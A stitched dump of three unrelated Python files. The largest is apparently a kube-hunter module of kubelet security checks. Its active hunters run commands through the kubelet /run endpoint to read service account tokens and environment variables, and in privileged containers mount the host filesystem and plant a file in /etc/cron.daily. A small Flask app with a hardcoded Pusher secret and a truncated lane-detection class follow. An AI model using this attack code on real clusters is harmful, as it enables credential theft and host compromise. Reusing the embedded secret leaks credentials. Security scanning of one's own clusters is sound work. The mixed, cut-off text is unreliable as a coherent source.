vid="KHV037",
)
class ExposedRunningPodsHandler(Vulnerability, Event):
"""Outputs a list of currently running pods,
and some of their metadata, which can reveal sensitive information"""
def __init__(self, count):
Vulnerability.__init__(
self,
component=Kubelet,
name="Exposed Running Pods",
category=AccessKubeletAPITechnique,
vid="KHV038",
)
self.count = count
self.evidence = f"{self.count} running pods"
class ExposedExecHandler(Vulnerability, Event):
"""An attacker could run arbitrary commands on a container"""
def __init__(self):
Vulnerability.__init__(
self,
component=Kubelet,
name="Exposed Exec On Container",
category=ExecIntoContainerTechnique,
vid="KHV039",
)
class ExposedRunHandler(Vulnerability, Event):
"""An attacker could run an arbitrary command inside a container"""
def __init__(self):
Vulnerability.__init__(
self,
component=Kubelet,
name="Exposed Run Inside Container",
category=ExecIntoContainerTechnique,
vid="KHV040",
)
class ExposedPortForwardHandler(Vulnerability, Event):
"""An attacker could set port forwarding rule on a pod"""
def __init__(self):
Vulnerability.__init__(
self,
component=Kubelet,
name="Exposed Port Forward",
category=GeneralDefenseEvasionTechnique,
vid="KHV041",
)
class ExposedAttachHandler(Vulnerability, Event):
"""Opens a websocket that could enable an attacker
to attach to a running container"""
def __init__(self):
Vulnerability.__init__(
self,
component=Kubelet,
name="Exposed Attaching To Container",
category=ExecIntoContainerTechnique,
vid="KHV042",
)
class ExposedHealthzHandler(Vulnerability, Event):
"""By accessing the open /healthz handler,
an attacker could get the cluster health state without authenticating"""
def __init__(self, status):
Vulnerability.__init__(
self,
component=Kubelet,
name="Cluster Health Disclosure",
category=GeneralSensitiveInformationTechnique,
vid="KHV043",
)
self.status = status
self.evidence = f"status: {self.status}"
class ExposedExistingPrivilegedContainersViaSecureKubeletPort(Vulnerability, Event):
"""A malicious actor, that has confirmed anonymous access to the API via the kubelet's secure port, \
can leverage the existing privileged containers identified to damage the host and potentially \
the whole cluster"""
def __init__(self, exposed_existing_privileged_containers):
Vulnerability.__init__(
self,
component=KubernetesCluster,
name="Exposed Existing Privileged Container(s) Via Secure Kubelet Port",
category=PrivilegedContainerTechnique,
vid="KHV051",
)
self.exposed_existing_privileged_containers = exposed_existing_privileged_containers
class PrivilegedContainers(Vulnerability, Event):
"""A Privileged container exist on a node
could expose the node/cluster to unwanted root operations"""
def __init__(self, containers):
Vulnerability.__init__(
self,
component=KubernetesCluster,
name="Privileged Container",
category=PrivilegedContainerTechnique,
vid="KHV044",
)
self.containers = containers
self.evidence = f"pod: {containers[0][0]}, " f"container: {containers[0][1]}, " f"count: {len(containers)}"
class ExposedSystemLogs(Vulnerability, Event):
"""System logs are exposed from the /logs endpoint on the kubelet"""
def __init__(self):
Vulnerability.__init__(
self,
component=Kubelet,
name="Exposed System Logs",
category=AccessKubeletAPITechnique,
vid="KHV045",
)
class ExposedKubeletCmdline(Vulnerability, Event):
"""Commandline flags that were passed to the kubelet can be obtained from the pprof endpoints"""
def __init__(self, cmdline):
Vulnerability.__init__(
self,
component=Kubelet,
name="Exposed Kubelet Cmdline",
category=AccessKubeletAPITechnique,
vid="KHV046",
)
self.cmdline = cmdline
self.evidence = f"cmdline: {self.cmdline}"
class KubeletHandlers(Enum):
# GET
PODS = "pods"
# GET
CONTAINERLOGS = "containerLogs/{pod_namespace}/{pod_id}/{container_name}"
# GET
RUNNINGPODS = "runningpods"
# GET -> WebSocket
EXEC = "exec/{pod_namespace}/{pod_id}/{container_name}?command={cmd}&input=1&output=1&tty=1"
# POST, For legacy reasons, it uses different query param than exec
RUN = "run/{pod_namespace}/{pod_id}/{container_name}?cmd={cmd}"
# GET/POST
PORTFORWARD = "portForward/{pod_namespace}/{pod_id}?port={port}"
# GET -> WebSocket
ATTACH = "attach/{pod_namespace}/{pod_id}/{container_name}?command={cmd}&input=1&output=1&tty=1"
# GET
LOGS = "logs/{path}"
# GET
PPROF_CMDLINE = "debug/pprof/cmdline"
@handler.subscribe(ReadOnlyKubeletEvent)
class ReadOnlyKubeletPortHunter(Hunter):
"""Kubelet Readonly Ports Hunter
Hunts specific endpoints on open ports in the readonly Kubelet server
"""
def __init__(self, event):
self.event = event
self.path = f"http://{self.event.host}:{self.event.port}"
self.pods_endpoint_data = ""
def get_k8s_version(self):
config = get_config()
logger.debug("Passive hunter is attempting to find kubernetes version")
metrics = requests.get(f"{self.path}/metrics", timeout=config.network_timeout).text
for line in metrics.split("\n"):
if line.startswith("kubernetes_build_info"):
for info in line[line.find("{") + 1 : line.find("}")].split(","):
k, v = info.split("=")
if k == "gitVersion":
return v.strip('"')
# returns list of tuples of Privileged container and their pod.
def find_privileged_containers(self):
logger.debug("Trying to find privileged containers and their pods")
privileged_containers = []
if self.pods_endpoint_data:
for pod in self.pods_endpoint_data["items"]:
for container in pod["spec"]["containers"]:
if container.get("securityContext", {}).get("privileged"):
privileged_containers.append((pod["metadata"]["name"], container["name"]))
return privileged_containers if len(privileged_containers) > 0 else None
def get_pods_endpoint(self):
config = get_config()
logger.debug("Attempting to find pods endpoints")
response = requests.get(f"{self.path}/pods", timeout=config.network_timeout)
if "items" in response.text:
return response.json()
def check_healthz_endpoint(self):
config = get_config()
r = requests.get(f"{self.path}/healthz", verify=False, timeout=config.network_timeout)
return r.text if r.status_code == 200 else False
def execute(self):
self.pods_endpoint_data = self.get_pods_endpoint()
k8s_version = self.get_k8s_version()
privileged_containers = self.find_privileged_containers()
healthz = self.check_healthz_endpoint()
if k8s_version:
self.publish_event(
K8sVersionDisclosure(version=k8s_version, from_endpoint="/metrics", extra_info="on Kubelet")
)
if privileged_containers:
self.publish_event(PrivilegedContainers(containers=privileged_containers))
if healthz:
self.publish_event(ExposedHealthzHandler(status=healthz))
if self.pods_endpoint_data:
self.publish_event(ExposedPodsHandler(pods=self.pods_endpoint_data["items"]))
@handler.subscribe(SecureKubeletEvent)
class SecureKubeletPortHunter(Hunter):
"""Kubelet Secure Ports Hunter
Hunts specific endpoints on an open secured Kubelet
"""
class DebugHandlers:
"""all methods will return the handler name if successful"""
def __init__(self, path, pod, session=None):
self.path = path + ("/" if not path.endswith("/") else "")
self.session = session if session else requests.Session()
self.pod = pod
# outputs logs from a specific container
def test_container_logs(self):
config = get_config()
logs_url = self.path + KubeletHandlers.CONTAINERLOGS.value.format(
pod_namespace=self.pod["namespace"],
pod_id=self.pod["name"],
container_name=self.pod["container"],
)
return self.session.get(logs_url, verify=False, timeout=config.network_timeout).status_code == 200
# need further investigation on websockets protocol for further implementation
def test_exec_container(self):
config = get_config()
# opens a stream to connect to using a web socket
headers = {"X-Stream-Protocol-Version": "v2.channel.k8s.io"}
exec_url = self.path + KubeletHandlers.EXEC.value.format(
pod_namespace=self.pod["namespace"],
pod_id=self.pod["name"],
container_name=self.pod["container"],
cmd="",
)
return (
"/cri/exec/"
in self.session.get(
exec_url,
headers=headers,
allow_redirects=False,
verify=False,
timeout=config.network_timeout,
).text
)
# need further investigation on websockets protocol for further implementation
def test_port_forward(self):
pass
# TODO: what to return?
# Example starting code:
#
# config = get_config()
# headers = {
# "Upgrade": "websocket",
# "Connection": "Upgrade",
# "Sec-Websocket-Key": "s",
# "Sec-Websocket-Version": "13",
# "Sec-Websocket-Protocol": "SPDY",
# }
# pf_url = self.path + KubeletHandlers.PORTFORWARD.value.format(
# pod_namespace=self.pod["namespace"],
# pod_id=self.pod["name"],
# port=80,
# )
# executes one command and returns output
def test_run_container(self):
config = get_config()
run_url = self.path + KubeletHandlers.RUN.value.format(
pod_namespace="test",
pod_id="test",
container_name="test",
cmd="",
)
# if we get this message, we know we passed Authentication and Authorization, and that the endpoint is enabled.
status_code = self.session.post(run_url, verify=False, timeout=config.network_timeout).status_code
return status_code == requests.codes.NOT_FOUND
# returns list of currently running pods
def test_running_pods(self):
config = get_config()
pods_url = self.path + KubeletHandlers.RUNNINGPODS.value
r = self.session.get(pods_url, verify=False, timeout=config.network_timeout)
return r.json() if r.status_code == 200 else False
# need further investigation on the differences between attach and exec
def test_attach_container(self):
config = get_config()
# headers={"X-Stream-Protocol-Version": "v2.channel.k8s.io"}
attach_url = self.path + KubeletHandlers.ATTACH.value.format(
pod_namespace=self.pod["namespace"],
pod_id=self.pod["name"],
container_name=self.pod["container"],
cmd="",
)
return (
"/cri/attach/"
in self.session.get(
attach_url,
allow_redirects=False,
verify=False,
timeout=config.network_timeout,
).text
)
# checks access to logs endpoint
def test_logs_endpoint(self):
config = get_config()
logs_url = self.session.get(
self.path + KubeletHandlers.LOGS.value.format(path=""),
timeout=config.network_timeout,
).text
return "<pre>" in logs_url
# returns the cmd line used to run the kubelet
def test_pprof_cmdline(self):
config = get_config()
cmd = self.session.get(
self.path + KubeletHandlers.PPROF_CMDLINE.value,
verify=False,
timeout=config.network_timeout,
)
return cmd.text if cmd.status_code == 200 else None
def __init__(self, event):
self.event = event
self.session = requests.Session()
if self.event.secure:
self.session.headers.update({"Authorization": f"Bearer {self.event.auth_token}"})
# self.session.cert = self.event.client_cert
# copy session to event
self.event.session = self.session
self.path = f"https://{self.event.host}:10250"
self.kubehunter_pod = {
"name": "kube-hunter",
"namespace": "default",
"container": "kube-hunter",
}
self.pods_endpoint_data = ""
def get_pods_endpoint(self):
config = get_config()
response = self.session.get(f"{self.path}/pods", verify=False, timeout=config.network_timeout)
if "items" in response.text:
return response.json()
def check_healthz_endpoint(self):
config = get_config()
r = requests.get(f"{self.path}/healthz", verify=False, timeout=config.network_timeout)
return r.text if r.status_code == 200 else False
def execute(self):
if self.event.anonymous_auth:
self.publish_event(AnonymousAuthEnabled())
self.pods_endpoint_data = self.get_pods_endpoint()
healthz = self.check_healthz_endpoint()
if self.pods_endpoint_data:
self.publish_event(ExposedPodsHandler(pods=self.pods_endpoint_data["items"]))
if healthz:
self.publish_event(ExposedHealthzHandler(status=healthz))
self.test_handlers()
def test_handlers(self):
config = get_config()
# if kube-hunter runs in a pod, we test with kube-hunter's pod
pod = self.kubehunter_pod if config.pod else self.get_random_pod()
if pod:
debug_handlers = self.DebugHandlers(self.path, pod, self.session)
try:
# TODO: use named expressions, introduced in python3.8
running_pods = debug_handlers.test_running_pods()
if running_pods:
self.publish_event(ExposedRunningPodsHandler(count=len(running_pods["items"])))
cmdline = debug_handlers.test_pprof_cmdline()
if cmdline:
self.publish_event(ExposedKubeletCmdline(cmdline=cmdline))
if debug_handlers.test_container_logs():
self.publish_event(ExposedContainerLogsHandler())
if debug_handlers.test_exec_container():
self.publish_event(ExposedExecHandler())
if debug_handlers.test_run_container():
self.publish_event(ExposedRunHandler())
if debug_handlers.test_port_forward():
self.publish_event(ExposedPortForwardHandler()) # not implemented
if debug_handlers.test_attach_container():
self.publish_event(ExposedAttachHandler())
if debug_handlers.test_logs_endpoint():
self.publish_event(ExposedSystemLogs())
except Exception:
logger.debug("Failed testing debug handlers", exc_info=True)
# trying to get a pod from default namespace, if doesn't exist, gets a kube-system one
def get_random_pod(self):
if self.pods_endpoint_data:
pods_data = self.pods_endpoint_data["items"]
def is_default_pod(pod):
return pod["metadata"]["namespace"] == "default" and pod["status"]["phase"] == "Running"
def is_kubesystem_pod(pod):
return pod["metadata"]["namespace"] == "kube-system" and pod["status"]["phase"] == "Running"
pod_data = next(filter(is_default_pod, pods_data), None)
if not pod_data:
pod_data = next(filter(is_kubesystem_pod, pods_data), None)
if pod_data:
container_data = pod_data["spec"]["containers"][0]
if container_data:
return {
"name": pod_data["metadata"]["name"],
"container": container_data["name"],
"namespace": pod_data["metadata"]["namespace"],
}
""" Active Hunters """
@handler.subscribe(AnonymousAuthEnabled)
class ProveAnonymousAuth(ActiveHunter):
"""Foothold Via Secure Kubelet Port
Attempts to demonstrate that a malicious actor can establish foothold into the cluster via a
container abusing the configuration of the kubelet's secure port: authentication-auth=false.
"""
def __init__(self, event):
self.event = event
self.base_url = f"https://{self.event.host}:10250/"
def get_request(self, url, verify=False):
config = get_config()
try:
response_text = self.event.session.get(url=url, verify=verify, timeout=config.network_timeout).text.rstrip()
return response_text
except Exception as ex:
logging.debug("Exception: " + str(ex))
return "Exception: " + str(ex)
def post_request(self, url, params, verify=False):
config = get_config()
try:
response_text = self.event.session.post(
url=url, verify=verify, params=params, timeout=config.network_timeout
).text.rstrip()
return response_text
except Exception as ex:
logging.debug("Exception: " + str(ex))
return "Exception: " + str(ex)
@staticmethod
def has_no_exception(result):
return "Exception: " not in result
@staticmethod
def has_no_error(result):
possible_errors = ["exited with", "Operation not permitted", "Permission denied", "No such file or directory"]
return not any(error in result for error in possible_errors)
@staticmethod
def has_no_error_nor_exception(result):
return ProveAnonymousAuth.has_no_error(result) and ProveAnonymousAuth.has_no_exception(result)
def cat_command(self, run_request_url, full_file_path):
return self.post_request(run_request_url, {"cmd": f"cat {full_file_path}"})
def process_container(self, run_request_url):
service_account_token = self.cat_command(run_request_url, "/var/run/secrets/kubernetes.io/serviceaccount/token")
environment_variables = self.post_request(run_request_url, {"cmd": "env"})
if self.has_no_error_nor_exception(service_account_token):
return {
"result": True,
"service_account_token": service_account_token,
"environment_variables": environment_variables,
}
return {"result": False}
def execute(self):
pods_raw = self.get_request(self.base_url + KubeletHandlers.PODS.value)
# At this point, the following must happen:
# a) we get the data of the running pods
# b) we get a forbidden message because the API server
# has a configuration that denies anonymous attempts despite the kubelet being vulnerable
if self.has_no_error_nor_exception(pods_raw) and "items" in pods_raw:
pods_data = json.loads(pods_raw)["items"]
temp_message = ""
exposed_existing_privileged_containers = list()
for pod_data in pods_data:
pod_namespace = pod_data["metadata"]["namespace"]
pod_id = pod_data["metadata"]["name"]
for container_data in pod_data["spec"]["containers"]:
container_name = container_data["name"]
run_request_url = self.base_url + f"run/{pod_namespace}/{pod_id}/{container_name}"
extracted_data = self.process_container(run_request_url)
if extracted_data["result"]:
service_account_token = extracted_data["service_account_token"]
environment_variables = extracted_data["environment_variables"]
temp_message += (
f"\n\nPod namespace: {pod_namespace}"
+ f"\n\nPod ID: {pod_id}"
+ f"\n\nContainer name: {container_name}"
+ f"\n\nService account token: {service_account_token}"
+ f"\nEnvironment variables: {environment_variables}"
)
first_check = container_data.get("securityContext", {}).get("privileged")
first_subset = container_data.get("securityContext", {})
second_subset = first_subset.get("capabilities", {})
data_for_second_check = second_subset.get("add", [])
second_check = "SYS_ADMIN" in data_for_second_check
if first_check or second_check:
exposed_existing_privileged_containers.append(
{
"pod_namespace": pod_namespace,
"pod_id": pod_id,
"container_name": container_name,
"service_account_token": service_account_token,
"environment_variables": environment_variables,
}
)
if temp_message:
message = "The following containers have been successfully breached." + temp_message
self.event.evidence = f"{message}"
if exposed_existing_privileged_containers:
self.publish_event(
ExposedExistingPrivilegedContainersViaSecureKubeletPort(
exposed_existing_privileged_containers=exposed_existing_privileged_containers
)
)
@handler.subscribe(ExposedExistingPrivilegedContainersViaSecureKubeletPort)
class MaliciousIntentViaSecureKubeletPort(ActiveHunter):
"""Malicious Intent Via Secure Kubelet Port
Attempts to demonstrate that a malicious actor can leverage existing privileged containers
exposed via the kubelet's secure port, due to anonymous auth enabled misconfiguration,
such that a process can be started or modified on the host.
"""
def __init__(self, event, seconds_to_wait_for_os_command=1):
self.event = event
self.base_url = f"https://{self.event.host}:10250/"
self.seconds_to_wait_for_os_command = seconds_to_wait_for_os_command
self.number_of_rm_attempts = 5
self.number_of_rmdir_attempts = 5
self.number_of_umount_attempts = 5
def post_request(self, url, params, verify=False):
config = get_config()
try:
response_text = self.event.session.post(
url, verify, params=params, timeout=config.network_timeout
).text.rstrip()
return response_text
except Exception as ex:
logging.debug("Exception: " + str(ex))
return "Exception: " + str(ex)
def cat_command(self, run_request_url, full_file_path):
return self.post_request(run_request_url, {"cmd": f"cat {full_file_path}"})
def clean_attacked_exposed_existing_privileged_container(
self,
run_request_url,
file_system_or_partition,
directory_created,
file_created,
number_of_rm_attempts,
number_of_umount_attempts,
number_of_rmdir_attempts,
seconds_to_wait_for_os_command,
):
self.rm_command(
run_request_url,
f"{directory_created}/etc/cron.daily/{file_created}",
number_of_rm_attempts,
seconds_to_wait_for_os_command,
)
self.umount_command(
run_request_url,
file_system_or_partition,
directory_created,
number_of_umount_attempts,
seconds_to_wait_for_os_command,
)
self.rmdir_command(
run_request_url,
directory_created,
number_of_rmdir_attempts,
seconds_to_wait_for_os_command,
)
def check_file_exists(self, run_request_url, file):
file_exists = self.ls_command(run_request_url=run_request_url, file_or_directory=file)
return ProveAnonymousAuth.has_no_error_nor_exception(file_exists)
def rm_command(self, run_request_url, file_to_remove, number_of_rm_attempts, seconds_to_wait_for_os_command):
if self.check_file_exists(run_request_url, file_to_remove):
for _ in range(number_of_rm_attempts):
command_execution_outcome = self.post_request(run_request_url, {"cmd": f"rm -f {file_to_remove}"})
if seconds_to_wait_for_os_command:
time.sleep(seconds_to_wait_for_os_command)
first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome)
second_check = self.check_file_exists(run_request_url, file_to_remove)
if first_check and not second_check:
return True
pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1]
container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2]
logger.warning(
"kube-hunter: "
+ "POD="
+ pod_id
+ ", "
+ "CONTAINER="
+ container_name
+ " - Unable to remove file: "
+ file_to_remove
)
return False
def chmod_command(self, run_request_url, permissions, file):
return self.post_request(run_request_url, {"cmd": f"chmod {permissions} {file}"})
def touch_command(self, run_request_url, file_to_create):
return self.post_request(run_request_url, {"cmd": f"touch {file_to_create}"})
def attack_exposed_existing_privileged_container(
self, run_request_url, directory_created, number_of_rm_attempts, seconds_to_wait_for_os_command, file_name=None
):
if file_name is None:
file_name = "kube-hunter" + str(uuid.uuid1())
file_name_with_path = f"{directory_created}/etc/cron.daily/{file_name}"
file_created = self.touch_command(run_request_url, file_name_with_path)
if ProveAnonymousAuth.has_no_error_nor_exception(file_created):
permissions_changed = self.chmod_command(run_request_url, "755", file_name_with_path)
if ProveAnonymousAuth.has_no_error_nor_exception(permissions_changed):
return {"result": True, "file_created": file_name}
self.rm_command(run_request_url, file_name_with_path, number_of_rm_attempts, seconds_to_wait_for_os_command)
return {"result": False}
def check_directory_exists(self, run_request_url, directory):
directory_exists = self.ls_command(run_request_url=run_request_url, file_or_directory=directory)
return ProveAnonymousAuth.has_no_error_nor_exception(directory_exists)
def rmdir_command(
self,
run_request_url,
directory_to_remove,
number_of_rmdir_attempts,
seconds_to_wait_for_os_command,
):
if self.check_directory_exists(run_request_url, directory_to_remove):
for _ in range(number_of_rmdir_attempts):
command_execution_outcome = self.post_request(run_request_url, {"cmd": f"rmdir {directory_to_remove}"})
if seconds_to_wait_for_os_command:
time.sleep(seconds_to_wait_for_os_command)
first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome)
second_check = self.check_directory_exists(run_request_url, directory_to_remove)
if first_check and not second_check:
return True
pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1]
container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2]
logger.warning(
"kube-hunter: "
+ "POD="
+ pod_id
+ ", "
+ "CONTAINER="
+ container_name
+ " - Unable to remove directory: "
+ directory_to_remove
)
return False
def ls_command(self, run_request_url, file_or_directory):
return self.post_request(run_request_url, {"cmd": f"ls {file_or_directory}"})
def umount_command(
self,
run_request_url,
file_system_or_partition,
directory,
number_of_umount_attempts,
seconds_to_wait_for_os_command,
):
# Note: the logic implemented proved more reliable than using "df"
# command to resolve for mounted systems/partitions.
current_files_and_directories = self.ls_command(run_request_url, directory)
if self.ls_command(run_request_url, directory) == current_files_and_directories:
for _ in range(number_of_umount_attempts):
# Ref: http://man7.org/linux/man-pages/man2/umount.2.html
command_execution_outcome = self.post_request(
run_request_url, {"cmd": f"umount {file_system_or_partition} {directory}"}
)
if seconds_to_wait_for_os_command:
time.sleep(seconds_to_wait_for_os_command)
first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome)
second_check = self.ls_command(run_request_url, directory) != current_files_and_directories
if first_check and second_check:
return True
pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1]
container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2]
logger.warning(
"kube-hunter: "
+ "POD="
+ pod_id
+ ", "
+ "CONTAINER="
+ container_name
+ " - Unable to unmount "
+ file_system_or_partition
+ " at: "
+ directory
)
return False
def mount_command(self, run_request_url, file_system_or_partition, directory):
# Ref: http://man7.org/linux/man-pages/man1/mkdir.1.html
return self.post_request(run_request_url, {"cmd": f"mount {file_system_or_partition} {directory}"})
def mkdir_command(self, run_request_url, directory_to_create):
# Ref: http://man7.org/linux/man-pages/man1/mkdir.1.html
return self.post_request(run_request_url, {"cmd": f"mkdir {directory_to_create}"})
def findfs_command(self, run_request_url, file_system_or_partition_type, file_system_or_partition):
# Ref: http://man7.org/linux/man-pages/man8/findfs.8.html
return self.post_request(
run_request_url, {"cmd": f"findfs {file_system_or_partition_type}{file_system_or_partition}"}
)
def get_root_values(self, command_line):
for command in command_line.split(" "):
# Check for variable-definition commands as there can be commands which don't define variables.
if "=" in command:
split = command.split("=")
if split[0] == "root":
if len(split) > 2:
# Potential valid scenario: root=LABEL=example
root_value_type = split[1] + "="
root_value = split[2]
return root_value, root_value_type
else:
root_value_type = ""
root_value = split[1]
return root_value, root_value_type
return None, None
def process_exposed_existing_privileged_container(
self,
run_request_url,
number_of_umount_attempts,
number_of_rmdir_attempts,
seconds_to_wait_for_os_command,
directory_to_create=None,
):
if directory_to_create is None:
directory_to_create = "/kube-hunter_" + str(uuid.uuid1())
# /proc/cmdline - This file shows the parameters passed to the kernel at the time it is started.
command_line = self.cat_command(run_request_url, "/proc/cmdline")
if ProveAnonymousAuth.has_no_error_nor_exception(command_line):
if len(command_line.split(" ")) > 0:
root_value, root_value_type = self.get_root_values(command_line)
# Move forward only when the "root" variable value was actually defined.
if root_value:
if root_value_type:
file_system_or_partition = self.findfs_command(run_request_url, root_value_type, root_value)
else:
file_system_or_partition = root_value
if ProveAnonymousAuth.has_no_error_nor_exception(file_system_or_partition):
directory_created = self.mkdir_command(run_request_url, directory_to_create)
if ProveAnonymousAuth.has_no_error_nor_exception(directory_created):
directory_created = directory_to_create
mounted_file_system_or_partition = self.mount_command(
run_request_url, file_system_or_partition, directory_created
)
if ProveAnonymousAuth.has_no_error_nor_exception(mounted_file_system_or_partition):
host_name = self.cat_command(run_request_url, f"{directory_created}/etc/hostname")
if ProveAnonymousAuth.has_no_error_nor_exception(host_name):
return {
"result": True,
"file_system_or_partition": file_system_or_partition,
"directory_created": directory_created,
}
self.umount_command(
run_request_url,
file_system_or_partition,
directory_created,
number_of_umount_attempts,
seconds_to_wait_for_os_command,
)
self.rmdir_command(
run_request_url,
directory_created,
number_of_rmdir_attempts,
seconds_to_wait_for_os_command,
)
return {"result": False}
def execute(self, directory_to_create=None, file_name=None):
temp_message = ""
for exposed_existing_privileged_containers in self.event.exposed_existing_privileged_containers:
pod_namespace = exposed_existing_privileged_containers["pod_namespace"]
pod_id = exposed_existing_privileged_containers["pod_id"]
container_name = exposed_existing_privileged_containers["container_name"]
run_request_url = self.base_url + f"run/{pod_namespace}/{pod_id}/{container_name}"
is_exposed_existing_privileged_container_privileged = self.process_exposed_existing_privileged_container(
run_request_url,
self.number_of_umount_attempts,
self.number_of_rmdir_attempts,
self.seconds_to_wait_for_os_command,
directory_to_create,
)
if is_exposed_existing_privileged_container_privileged["result"]:
file_system_or_partition = is_exposed_existing_privileged_container_privileged[
"file_system_or_partition"
]
directory_created = is_exposed_existing_privileged_container_privileged["directory_created"]
# Execute attack attempt: start/modify process in host.
attack_successful_on_exposed_privileged_container = self.attack_exposed_existing_privileged_container(
run_request_url,
directory_created,
self.number_of_rm_attempts,
self.seconds_to_wait_for_os_command,
file_name,
)
if attack_successful_on_exposed_privileged_container["result"]:
file_created = attack_successful_on_exposed_privileged_container["file_created"]
self.clean_attacked_exposed_existing_privileged_container(
run_request_url,
file_system_or_partition,
directory_created,
file_created,
self.number_of_rm_attempts,
self.number_of_umount_attempts,
self.number_of_rmdir_attempts,
self.seconds_to_wait_for_os_command,
)
temp_message += "\n\nPod namespace: {}\n\nPod ID: {}\n\nContainer name: {}".format(
pod_namespace, pod_id, container_name
)
if temp_message:
message = (
"The following exposed existing privileged containers"
+ " have been successfully abused by starting/modifying a process in the host."
+ temp_message
)
self.event.evidence = f"{message}"
else:
message = (
"The following exposed existing privileged containers"
+ " were not successfully abused by starting/modifying a process in the host."
+ "Keep in mind that attackers might use other methods to attempt to abuse them."
+ temp_message
)
self.event.evidence = f"{message}"
@handler.subscribe(ExposedRunHandler)
class ProveRunHandler(ActiveHunter):
"""Kubelet Run Hunter
Executes uname inside of a random container
"""
def __init__(self, event):
self.event = event
self.base_path = f"https://{self.event.host}:{self.event.port}"
def run(self, command, container):
config = get_config()
run_url = KubeletHandlers.RUN.value.format(
pod_namespace=container["namespace"],
pod_id=container["pod"],
container_name=container["name"],
cmd=command,
)
return self.event.session.post(
f"{self.base_path}/{run_url}",
verify=False,
timeout=config.network_timeout,
).text
def execute(self):
config = get_config()
r = self.event.session.get(
f"{self.base_path}/" + KubeletHandlers.PODS.value,
verify=False,
timeout=config.network_timeout,
)
if "items" in r.text:
pods_data = r.json()["items"]
for pod_data in pods_data:
container_data = pod_data["spec"]["containers"][0]
if container_data:
output = self.run(
"uname -a",
container={
"namespace": pod_data["metadata"]["namespace"],
"pod": pod_data["metadata"]["name"],
"name": container_data["name"],
},
)
if output and "exited with" not in output:
self.event.evidence = "uname -a: " + output
break
@handler.subscribe(ExposedContainerLogsHandler)
class ProveContainerLogsHandler(ActiveHunter):
"""Kubelet Container Logs Hunter
Retrieves logs from a random container
"""
def __init__(self, event):
self.event = event
protocol = "https" if self.event.port == 10250 else "http"
self.base_url = f"{protocol}://{self.event.host}:{self.event.port}/"
def execute(self):
config = get_config()
pods_raw = self.event.session.get(
self.base_url + KubeletHandlers.PODS.value,
verify=False,
timeout=config.network_timeout,
).text
if "items" in pods_raw:
pods_data = json.loads(pods_raw)["items"]
for pod_data in pods_data:
container_data = pod_data["spec"]["containers"][0]
if container_data:
container_name = container_data["name"]
output = requests.get(
f"{self.base_url}/"
+ KubeletHandlers.CONTAINERLOGS.value.format(
pod_namespace=pod_data["metadata"]["namespace"],
pod_id=pod_data["metadata"]["name"],
container_name=container_name,
),
verify=False,
timeout=config.network_timeout,
)
if output.status_code == 200 and output.text:
self.event.evidence = f"{container_name}: {output.text}"
return
@handler.subscribe(ExposedSystemLogs)
class ProveSystemLogs(ActiveHunter):
"""Kubelet System Logs Hunter
Retrieves commands from host's system audit
"""
def __init__(self, event):
self.event = event
self.base_url = f"https://{self.event.host}:{self.event.port}"
def execute(self):
config = get_config()
audit_logs = self.event.session.get(
f"{self.base_url}/" + KubeletHandlers.LOGS.value.format(path="audit/audit.log"),
verify=False,
timeout=config.network_timeout,
)
# TODO: add more methods for proving system logs
if audit_logs.status_code == requests.status_codes.codes.OK:
logger.debug(f"Audit log of host {self.event.host}: {audit_logs.text[:10]}")
# iterating over proctitles and converting them into readable strings
proctitles = []
for proctitle in re.findall(r"proctitle=(\w+)", audit_logs.text):
proctitles.append(bytes.fromhex(proctitle).decode("utf-8").replace("\x00", " "))
self.event.proctitles = proctitles
self.event.evidence = f"audit log: {proctitles}"
else:
self.event.evidence = "Could not parse system logs"
| StarcoderdataPython |
1998882 | <filename>realtime-feed/app.py<gh_stars>0
# ./app.py
from flask import Flask, render_template, request, jsonify
from pusher import Pusher
import uuid
# create flask app
app = Flask(__name__)
# configure pusher object
pusher = Pusher(
app_id='526937',
key='00e43de0549d95ef2e5f',
secret='9f555fe422de52f88f26',
cluster='eu',
ssl=True
)
# index route
@app.route('/')
def index():
return render_template('index.html')
# feed route
@app.route('/feed')
def feed():
return render_template('feed.html')
# store post
@app.route('/post', methods=['POST'])
def addPost():
data = {
'id': "post-{}".format(uuid.uuid4().hex),
'title': request.form.get('title'),
'content': request.form.get('content'),
'status': 'active',
'event_name': 'created'
}
pusher.trigger("blog", "post-added", data)
return jsonify(data)
# deactivate or delete post
@app.route('/post/<id>', methods=['PUT', 'DELETE'])
def updatePost(id):
data = {'id': id}
if request.method == 'DELETE':
data['event_name'] = 'deleted'
pusher.trigger("blog", "post-deleted", data)
else:
data['event_name'] = 'deactivated'
pusher.trigger("blog", "post-deactivated", data)
return jsonify(data)
# run flask app in debug mode
app.run(debug=True)
| StarcoderdataPython |
4951265 | from typing import List, Tuple, Optional
import math
import numpy as np
from itertools import product
from queue import PriorityQueue
from abc import abstractmethod
from itertools import chain
from pprint import pprint
import logging
from lane_detection.segment import Segment
# Configure logging should be moved
logging.basicConfig(filename="utils.log", level=logging.DEBUG)
class Mergeable:
"""A helper class to contain merged nodes indexed by the sorted tuple of original indices"""
def __init__(self, id_: Tuple[int]):
self._id = id_ # tuple(sorted(list(id_))) # tuple merged (the order matters)
def __repr__(self):
return str(self._id)
def __hash__(self):
return int("".join(map(str, sorted(self._id))))
def cache(self, store: dict):
"""Compute the merge and store it"""
def retrieve(self, store) -> Optional["Mergeable"]:
"""Retrieves the merge from a store"""
return store.get(self._id, None)
@abstractmethod
def compute(self, cache: Optional[dict] = None, update=False):
"""Compute the merge using optionally a store/cache"""
class SegmentCluster(Mergeable):
def __init__(self, id_: Tuple[int], data=List[Segment]):
super().__init__(id_)
self.__data = data
self._logger = logging.getLogger(__name__) # init logger
def compute(self, cache: Optional[dict] = None, update=False):
"""Compute a segment merge from original container and a cache
:cache: a cache/storing precomputed merge
:param update: update the cache with the newly computed items.
"""
self._logger.debug(self._id)
if cache and self._id in cache:
return cache[self._id]
# merge
if len(self._id) == 1:
return self.__data[self._id[0]]
output = (
SegmentCluster(self._id[:-1], data=self.__data)
.compute(cache, update=update)
.merge(self.__data[self._id[-1]])
)
if update:
cache[self._id] = output
return output
def sim(
self,
other: "SegmentCluster",
